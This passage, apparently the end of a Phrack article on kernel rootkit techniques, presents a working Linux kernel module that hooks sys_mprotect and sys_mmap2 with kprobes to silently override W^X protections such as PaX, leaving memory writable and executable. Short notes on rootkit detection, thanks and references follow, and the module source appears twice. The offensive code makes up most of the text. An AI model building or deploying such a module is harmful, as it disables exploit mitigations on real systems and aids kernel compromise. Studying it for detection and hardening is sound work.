        if (prot & (PROT_WRITE|PROT_EXEC)) {
                mprotect.assign_wx++;
                goto free_sem;
        }
        if (prot & PROT_WRITE) {
                mprotect.assign_wx++;
                goto free_sem;
        }
        if (prot & PROT_EXEC) {
                mprotect.assign_wx++;
                goto free_sem;
        }
free_sem:
        up_write(&current->mm->mmap_sem);
out:
        jprobe_return();
        return 0;
}

/* Before the following function is executed, a W^X patch such as PaX
   mprotect/mmap restrictions will have run code such as:

        if ((vm_flags & (VM_WRITE | VM_EXEC)) != VM_EXEC)
                vm_flags &= ~(VM_EXEC | VM_MAYEXEC);
        else
                vm_flags &= ~(VM_WRITE | VM_MAYWRITE);

   But our return probe gets the last say in the matter. mprotect will
   return as though it failed (with an error value), but the VMAs/memory
   maps will be both write+execute -- just make sure you don't error
   check and then exit when mprotect or mmap "fail", because they will
   return failure values.
 */
static int rp_mprotect(struct kretprobe_instance *ri, struct pt_regs *regs)
{
        struct vm_area_struct *vma;

        if (!mprotect.assign_wx)
                goto out;

        down_write(&current->mm->mmap_sem);

        /* Get vma for start memory area */
        vma = find_vma(current->mm, mprotect.start);
        if (!vma)
                goto sem_out;

        if (mprotect.prot & PROT_EXEC) {
                vma->vm_flags |= VM_MAYEXEC;
                vma->vm_flags |= VM_EXEC;
        }
        if (mprotect.prot & PROT_WRITE) {
                vma->vm_flags |= VM_MAYWRITE;
                vma->vm_flags |= VM_WRITE;
        }
sem_out:
        up_write(&current->mm->mmap_sem);
out:
        return 0;
}

struct {
        unsigned long addr;
#define MMAP_CLEAN 0
#define MMAP_DIRTY 1
        int mmap_prot_state;
        unsigned int len;
} do_mmap_data;

/* Return probe code for sys_mmap2 */
static int rp_mmap(struct kretprobe_instance *ri, struct pt_regs *regs)
{
        struct vm_area_struct *vma = current->mm->mmap;

        /* We are assuming the default function to get an unmapped
           region is arch_get_unmapped_area_topdown() */
        if (do_mmap_data.addr - regs->eax == do_mmap_data.len)
                do_mmap_data.addr = regs->eax;
        else
                goto out; // pretty unlikely

        switch(do_mmap_data.mmap_prot_state) {
        case MMAP_CLEAN:
                break;
        case MMAP_DIRTY:
                // let's undo the work of the W^X patch :)
                down_write(&current->mm->mmap_sem);
                vma = find_vma(current->mm, do_mmap_data.addr);
                if (!vma) {
                        /* don't leak the semaphore on the error path */
                        up_write(&current->mm->mmap_sem);
                        break;
                }
                printk("Found vma's and setting all writes and exec possibilities\n");
                vma->vm_flags |= (VM_EXEC | VM_MAYEXEC);
                vma->vm_flags |= (VM_WRITE | VM_MAYWRITE);
                up_write(&current->mm->mmap_sem);
                break;
        }
out:
        return 0;
}

asmlinkage long kp_sys_mmap2(unsigned long addr, unsigned long len,
                unsigned long prot, unsigned long flags,
                unsigned long fd, unsigned long pgoff)
{
        struct file *file = NULL;

        printk("In sys_mmap2\n");
        do_mmap_data.len = len;

        /* We emulate a combination of sys_mmap2 and do_mmap_pgoff */

        /* This is the easiest scenario
           because we know the mmap addr */
        if (flags & MAP_FIXED) {
                printk("MAP_FIXED\n");
                do_mmap_data.addr = addr;
                if ((prot & PROT_EXEC) && (prot & PROT_WRITE))
                        do_mmap_data.mmap_prot_state = MMAP_DIRTY;
                else
                        do_mmap_data.mmap_prot_state = MMAP_CLEAN;
                goto out;
        }

        flags &= ~(MAP_EXECUTABLE | MAP_DENYWRITE);
        if (!(flags & MAP_ANONYMOUS)) {
                file = fget(fd);
                if (!file)
                        goto out;
        }

        /* mimic do_mmap_pgoff to get the linear range */
        down_write(&current->mm->mmap_sem);

        if (file) {
                if (!file->f_op || !file->f_op->mmap)
                        goto sem_out;
        }

        if (!len)
                goto sem_out;

        len = PAGE_ALIGN(len);
        if (!len || len > TASK_SIZE)
                goto sem_out;

        if ((pgoff + (len >> PAGE_SHIFT)) < pgoff)
                goto sem_out;

        /* When the real sys_mmap2/do_mmap_pgoff are called they will get
         * the next linear range, which will be at
         * do_mmap_data.addr - do_mmap_data.len. This relies on
         * get_unmapped_area() calling arch_get_unmapped_area_topdown() */
        printk("get_unmapped_area call\n");
        addr = _get_unmapped_area(file, addr, len, 0, flags);
        printk("addr: 0x%lx\n", addr);
        do_mmap_data.addr = addr;

        if ((prot & PROT_EXEC) && (prot & PROT_WRITE))
                do_mmap_data.mmap_prot_state = MMAP_DIRTY;
        else
                do_mmap_data.mmap_prot_state = MMAP_CLEAN;
sem_out:
        up_write(&current->mm->mmap_sem);
out:
        jprobe_return();
        return 0;
}

static struct jprobe sys_mmap2_jprobe = {
        .entry = (kprobe_opcode_t *)kp_sys_mmap2
};

static struct jprobe sys_mprotect_jprobe = {
        .entry = (kprobe_opcode_t *)kp_sys_mprotect
};

static struct kretprobe mprotect_kretprobe = {
        .handler = rp_mprotect,
        .maxactive = 1 // this code isn't really SMP reliable
};

static struct kretprobe mmap_kretprobe = {
        .handler = rp_mmap,
        .maxactive = 1 // this code isn't really SMP reliable
};

void exit_module(void)
{
        unregister_jprobe(&sys_mmap2_jprobe);
        unregister_jprobe(&sys_mprotect_jprobe);
        unregister_kretprobe(&mprotect_kretprobe);
        unregister_kretprobe(&mmap_kretprobe);
}

int init_module(void)
{
        int j = 0, k = 0;

        _get_unmapped_area =
            (void *)_kallsyms_lookup_name("arch_get_unmapped_area_topdown");
        sys_mmap2_jprobe.kp.addr =
            (void *)_kallsyms_lookup_name("sys_mmap2");

        /* Register our jprobes */
        if (register_jprobe(&sys_mmap2_jprobe) < 0)
                goto jfail;
        j++;
        sys_mprotect_jprobe.kp.addr = (void
*)_kallsyms_lookup_name("sys_mprotect");
        if (register_jprobe(&sys_mprotect_jprobe) < 0)
                goto jfail;

        mprotect_kretprobe.kp.addr =
            (void *)_kallsyms_lookup_name("sys_mprotect");

        /* Register our kretprobes */
        if (register_kretprobe(&mprotect_kretprobe) < 0)
                goto kfail;
        k++;
        mmap_kretprobe.kp.addr =
            (void *)_kallsyms_lookup_name("sys_mmap2");
        if (register_kretprobe(&mmap_kretprobe) < 0)
                goto kfail;

        return 0;
jfail:
        printk(KERN_EMERG "register_jprobe failed for %s\n",
               (!j ? "sys_mmap2" : "sys_mprotect"));
        return -1;
kfail:
        printk(KERN_EMERG "register_kretprobe failed for %s\n",
               (!k ? "mprotect" : "mmap"));
        return -1;
}
module_exit(exit_module);

--- end of code ---

---[ 4 - Notes on rootkit detection for kprobes

If a kernel rootkit is designed solely using kprobes and properly hides itself from the kprobe entries in sysfs, a rootkit detection program can still easily detect which kernel functions have been hooked. I will leave this obvious solution to anyone interested in adding the feature to their detectors, but the answer lies in this paper as well as in the kprobe documentation.

---[ 5 - Summing it all up

We have seen that the kprobe interface, which is primarily implemented for kernel debugging, can be used to instrument the kernel in some interesting ways. We have explored kprobes' strengths and weaknesses, and provided several examples of weakening the kernel by patching it using jprobe and kretprobe techniques. We also went over some ideas for implementing a more hacker-friendly kretprobe (although we did not provide one). It is also important to mention, for people who are engineering security code, that kprobes can be used to debug kernel code as well as to install simple patches for hardening the kernel. But Phrack isn't about that, so patches to harden the kernel were not included -- just know that it is possible.

---[ 6 - Greetz

kad - Thanks for encouraging me to write this, and for being a cool guy with priceless skills and good advice.
Silvio - My initial inspiration for kernel and ELF hacking all started with you. You've been a good friend and mentor; many many thanks.

chrak - My long time friend and occasional coding partner. 13 years ago this guy helped me write my first backdoor program for Linux.

nynex - I owe you for hosting my stuff and being a good friend.

mayhem - For writing some really cool ELF code and being an inspiration.

grugq - Your original AF work has been an inspiration as well.

halfdead - For knowing everything about the universe and our realm *literally*.

jimjones (UNIX Terrorist) - You will be getting a copy of this soon, word.

All of the digitalnerds -- especially halfdead, scrippie, pronsa and abh.

#bitlackeys on EFnet, a small and strange little channel with people whom I've been friends with for years.

#formal on a secret network with extremely smart people and good conversation.

RuxCon folk are pretty much all awesome too, thanks.

---[ 7 - References

Please note that I did not use any references other than code and official documentation for this paper, but the following papers are quite relevant, and since I have read them (along with many other great papers) they all play a role in my collective knowledge of kernel malware and rootkit exploration.

[1] kad - Handling interrupt descriptor table for fun and profit
    http://www.phrack.org/issues.html?issue=59&id=4#article

[2] Halfdead - Mystifying the debugger for ultimate stealthness
    http://www.phrack.org/issues.html?issue=65&id=8#article

[3] Silvio - Kernel function hijacking (function trampolines)
    http://vxheavens.com/lib/vsc08.html

---[ 8 - Code

/* Tested on the 2.6.18 kernel; on modern kernels change regs->eax to
   regs->ax. From the ElfMaster, 2010.
   Makefile:

   obj-m += w_plus_x.o
   MODULES = w_plus_x.ko

   all: clean $(MODULES)

   $(MODULES):
           make -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules

   clean:
           rm -f *.o *.ko Module.markers Module.symvers w_plus_x*.mod.c modules.order
*/

#include <linux/kernel.h>
#include <linux/module.h>
#include <linux/kprobes.h>
#include <linux/mm.h>
#include <linux/fs.h>
#include <linux/file.h>

#define PROT_READ       0x1     /* Page can be read. */
#define PROT_WRITE      0x2     /* Page can be written. */
#define PROT_EXEC       0x4     /* Page can be executed. */
#define PROT_NONE       0x0     /* Page can not be accessed. */

#define MAP_FIXED       0x10
#define MAP_ANONYMOUS   0x20    /* don't use a file */
#define MAP_GROWSDOWN   0x0100  /* stack-like segment */
#define MAP_DENYWRITE   0x0800  /* ETXTBSY */
#define MAP_EXECUTABLE  0x1000  /* mark it as an executable */

/*
 * It is preferable to write a script that gets
 * kallsyms_lookup_name() from System.map and then
 * passes it as a module parameter, but in this example
 * we just look it up and assign it ourselves, so
 * make sure to change the address.
 */
unsigned long (*_kallsyms_lookup_name)(char *) = (void *)0xc043e5d0; // change this

unsigned long (*_get_unmapped_area)(struct file *file, unsigned long addr,
                unsigned long len, unsigned long pgoff, unsigned long flags);

static struct {
        int assign_wx;
        unsigned long start;
        size_t len;
        long prot;
} mprotect;

MODULE_LICENSE("GPL");

asmlinkage int kp_sys_mprotect(unsigned long start, size_t len, long prot)
{
        struct vm_area_struct *vma = current->mm->mmap;

        mprotect.assign_wx = 0;
        mprotect.start = start;
        mprotect.prot = prot;

        /* This doesn't concern us */
        if (!(prot & PROT_EXEC) && !(prot & PROT_WRITE))
                goto out;

        down_write(&current->mm->mmap_sem);

        /* Get vma for start memory area */
        vma = find_vma(current->mm, start);
        if (!vma)
                goto free_sem;

        if (prot & (PROT_WRITE|PROT_EXEC)) {
                mprotect.assign_wx++;
                goto free_sem;
        }
        if (prot & PROT_WRITE) {
                mprotect.assign_wx++;
                goto free_sem;
        }
        if (prot & PROT_EXEC) {
                mprotect.assign_wx++;
                goto free_sem;
        }
free_sem:
        up_write(&current->mm->mmap_sem);
out:
        jprobe_return();
        return 0;
}

/* Before the following function is executed, a W^X patch such as PaX
   mprotect/mmap restrictions will have run code such as:

        if ((vm_flags & (VM_WRITE | VM_EXEC)) != VM_EXEC)
                vm_flags &= ~(VM_EXEC | VM_MAYEXEC);
        else
                vm_flags &= ~(VM_WRITE | VM_MAYWRITE);

   But our return probe gets the last say in the matter. mprotect will
   return as though it failed (with an error value), but the VMAs/memory
   maps will be both write+execute -- just make sure you don't error
   check and then exit when mprotect or mmap "fail", because they will
   return failure values.
 */
static int rp_mprotect(struct kretprobe_instance *ri, struct pt_regs *regs)
{
        struct vm_area_struct *vma;

        if (!mprotect.assign_wx)
                goto out;

        down_write(&current->mm->mmap_sem);

        /* Get vma for start memory area */
        vma = find_vma(current->mm, mprotect.start);
        if (!vma)
                goto sem_out;

        if (mprotect.prot & PROT_EXEC) {
                vma->vm_flags |= VM_MAYEXEC;
                vma->vm_flags |= VM_EXEC;
        }
        if (mprotect.prot & PROT_WRITE) {
                vma->vm_flags |= VM_MAYWRITE;
                vma->vm_flags |= VM_WRITE;
        }
sem_out:
        up_write(&current->mm->mmap_sem);
out:
        return 0;
}

struct {
        unsigned long addr;
#define MMAP_CLEAN 0
#define MMAP_DIRTY 1
        int mmap_prot_state;
        unsigned int len;
} do_mmap_data;

/* Return probe code for sys_mmap2 */
static int rp_mmap(struct kretprobe_instance *ri, struct pt_regs *regs)
{
        struct vm_area_struct *vma = current->mm->mmap;

        /* We are assuming the default function to get an unmapped
           region is arch_get_unmapped_area_topdown() */
        if (do_mmap_data.addr - regs->eax == do_mmap_data.len)
                do_mmap_data.addr = regs->eax;
        else
                goto out; // pretty unlikely

        switch(do_mmap_data.mmap_prot_state) {
        case MMAP_CLEAN:
                break;
        case MMAP_DIRTY:
                // let's undo the work of the W^X patch :)
                down_write(&current->mm->mmap_sem);
                vma = find_vma(current->mm, do_mmap_data.addr);
                if (!vma) {
                        /* don't leak the semaphore on the error path */
                        up_write(&current->mm->mmap_sem);
                        break;
                }
                printk("Found vma's and setting all writes and exec possibilities\n");
                vma->vm_flags |= (VM_EXEC | VM_MAYEXEC);
                vma->vm_flags |= (VM_WRITE | VM_MAYWRITE);
                up_write(&current->mm->mmap_sem);
                break;
        }
out:
        return 0;
}

asmlinkage long kp_sys_mmap2(unsigned long addr, unsigned long len,
                unsigned long prot, unsigned long flags,
                unsigned long fd, unsigned long pgoff)
{
        struct file *file = NULL;

        printk("In sys_mmap2\n");
        do_mmap_data.len = len;

        /* We emulate a combination of sys_mmap2 and do_mmap_pgoff */

        /* This is the easiest scenario
           because we know the mmap addr */
        if (flags & MAP_FIXED) {
                printk("MAP_FIXED\n");
                do_mmap_data.addr = addr;
                if ((prot & PROT_EXEC) && (prot & PROT_WRITE))
                        do_mmap_data.mmap_prot_state = MMAP_DIRTY;
                else
                        do_mmap_data.mmap_prot_state = MMAP_CLEAN;
                goto out;
        }

        flags &= ~(MAP_EXECUTABLE | MAP_DENYWRITE);
        if (!(flags & MAP_ANONYMOUS)) {
                file = fget(fd);
                if (!file)
                        goto out;
        }

        /* mimic do_mmap_pgoff to get the linear range */
        down_write(&current->mm->mmap_sem);

        if (file) {
                if (!file->f_op || !file->f_op->mmap)
                        goto sem_out;
        }

        if (!len)
                goto sem_out;

        len = PAGE_ALIGN(len);
        if (!len || len > TASK_SIZE)
                goto sem_out;

        if ((pgoff + (len >> PAGE_SHIFT)) < pgoff)
                goto sem_out;

        /* When the real sys_mmap2/do_mmap_pgoff are called they will get
         * the next linear range, which will be at
         * do_mmap_data.addr - do_mmap_data.len. This relies on
         * get_unmapped_area() calling arch_get_unmapped_area_topdown() */
        printk("get_unmapped_area call\n");
        addr = _get_unmapped_area(file, addr, len, 0, flags);
        printk("addr: 0x%lx\n", addr);
        do_mmap_data.addr = addr;

        if ((prot & PROT_EXEC) && (prot & PROT_WRITE))
                do_mmap_data.mmap_prot_state = MMAP_DIRTY;
        else
                do_mmap_data.mmap_prot_state = MMAP_CLEAN;
sem_out:
        up_write(&current->mm->mmap_sem);
out:
        jprobe_return();
        return 0;
}

static struct jprobe sys_mmap2_jprobe = {
        .entry = (kprobe_opcode_t *)kp_sys_mmap2
};

static struct jprobe sys_mprotect_jprobe = {
        .entry = (kprobe_opcode_t *)kp_sys_mprotect
};

static struct kretprobe mprotect_kretprobe = {
        .handler = rp_mprotect,
        .maxactive = 1 // this code isn't really SMP reliable
};

static struct kretprobe mmap_kretprobe = {
        .handler = rp_mmap,
        .maxactive = 1 // this code isn't really SMP reliable
};

void exit_module(void)
{
        unregister_jprobe(&sys_mmap2_jprobe);
        unregister_jprobe(&sys_mprotect_jprobe);
        unregister_kretprobe(&mprotect_kretprobe);
        unregister_kretprobe(&mmap_kretprobe);
}

int init_module(void)
{
        int j = 0, k = 0;

        _get_unmapped_area =
            (void *)_kallsyms_lookup_name("arch_get_unmapped_area_topdown");
        sys_mmap2_jprobe.kp.addr =
            (void *)_kallsyms_lookup_name("sys_mmap2");

        /* Register our jprobes */
        if (register_jprobe(&sys_mmap2_jprobe) < 0)
                goto jfail;
        j++;
        sys_mprotect_jprobe.kp.addr = (void
*)_kallsyms_lookup_name("sys_mprotect");
        if (register_jprobe(&sys_mprotect_jprobe) < 0)
                goto jfail;

        mprotect_kretprobe.kp.addr =
            (void *)_kallsyms_lookup_name("sys_mprotect");

        /* Register our kretprobes */
        if (register_kretprobe(&mprotect_kretprobe) < 0)
                goto kfail;
        k++;
        mmap_kretprobe.kp.addr =
            (void *)_kallsyms_lookup_name("sys_mmap2");
        if (register_kretprobe(&mmap_kretprobe) < 0)
                goto kfail;

        return 0;
jfail:
        printk(KERN_EMERG "register_jprobe failed for %s\n",
               (!j ? "sys_mmap2" : "sys_mprotect"));
        return -1;
kfail:
        printk(KERN_EMERG "register_kretprobe failed for %s\n",
               (!k ? "mprotect" : "mmap"));
        return -1;
}
module_exit(exit_module);

----EOF----